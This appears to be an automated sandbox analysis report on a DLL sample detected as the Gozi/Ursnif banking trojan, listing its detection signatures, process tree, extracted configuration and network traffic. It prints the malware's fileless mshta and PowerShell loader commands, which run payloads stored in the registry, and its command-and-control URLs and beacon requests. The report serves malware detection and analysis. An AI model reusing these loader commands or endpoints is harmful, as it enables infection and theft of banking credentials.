Loading ...

Play interactive tourEdit tour

Analysis Report u8xtCk7fq8.dll

Overview

General Information

Sample Name:u8xtCk7fq8.dll
Analysis ID:352339
MD5:913c77883aa2e28ec98e5cf86d6fc2cb
SHA1:5a5c60b32770cb4654269a812d07e13767ad7ed6
SHA256:ae55975bd40147ab3b9a02f1e2e0279f714bce9845d26ace252cd590a42d733d
Tags:dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6224 cmdline: loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 6352 cmdline: rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3728 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6548 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 2268 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 3540 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3548 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6684 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6556 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 1864 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6200 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6444 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 26 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3548, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', ProcessId: 6684
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3540, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 3548

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoAvira URL Cloud: Label: malware
            Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0Avira URL Cloud: Label: malware
            Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/Avira URL Cloud: Label: malware
            Source: http://c56.lepini.at/jvassets/xI/t64.datAvira URL Cloud: Label: phishing
            Source: http://golang.feel500.at/favicon.icoAvira URL Cloud: Label: malware
            Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pREAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: loaddll32.exe.6224.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: go.in100k.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: u8xtCk7fq8.dllVirustotal: Detection: 33%Perma Link
            Machine Learning detection for sampleShow sources
            Source: u8xtCk7fq8.dllJoe Sandbox ML: detected

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: u8xtCk7fq8.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_009C888D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_009BE0BA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_009D4FE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_00CA888D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00C9E0BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_00CB4FE1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_009C05EF
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: global trafficHTTP traffic detected: GET /api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/PA66UeKSfQRT_2Fcj/iLfHO8gQWTV6/hOef_2Bpj3m/vKET8aGISBfnMY/C7Rg8qWLOVBJvNGoXa3bh/JqG7kZOU_2B7n24F/sOI2F2WFZ1YAPkN/T_2BsNeHboXzrn7jqx/15bjKyLUT/gDA9ARyVldWTTyiXOC6v/tXtwdM8cZwpPI2KIOCU/YL8nL41xllyGRALppW8L48/k1SWSYBtfCxFZ/fJXP1vjj/fSbg8F1Si24u64v54ydTM3o/jeiSZAFtwp/B6QKlmIvy6M21AUkZ/3j_2BqQ9D79g/1CFMkegOFCy/pEDZCVezoXWN_2/Bc4g_2B7Dm/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/YULajG8YI4XFMV/YmAg5JNx_2FDNG7TuSVBW/rDRyxARgDEEEuHQw/evIJnvp2g7SCy8L/bJrKo5atF48FzBlZet/fbl2Ha7GH/_2BH9MOFklEvfboI7qgC/aeuT1qWtgUC6wBSbBT9/_2BAmM7g9d5p3WEfySPQlF/ssCzZKRVALgEk/sp0I8w6X/DrAFLFSHvA1oX_2BP0tpKNl/ZAxxPEdckm/yZJPnbWMUA7uRge39/ml3K2b_2FU2A/XzCLaq3SmxR/10nkXEQkMm0VbN/VC8xNzQeSqT1Wl479mf3g/IZqBR2_2FJ_2BQ8j/wVSGqvItzNt/3rN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
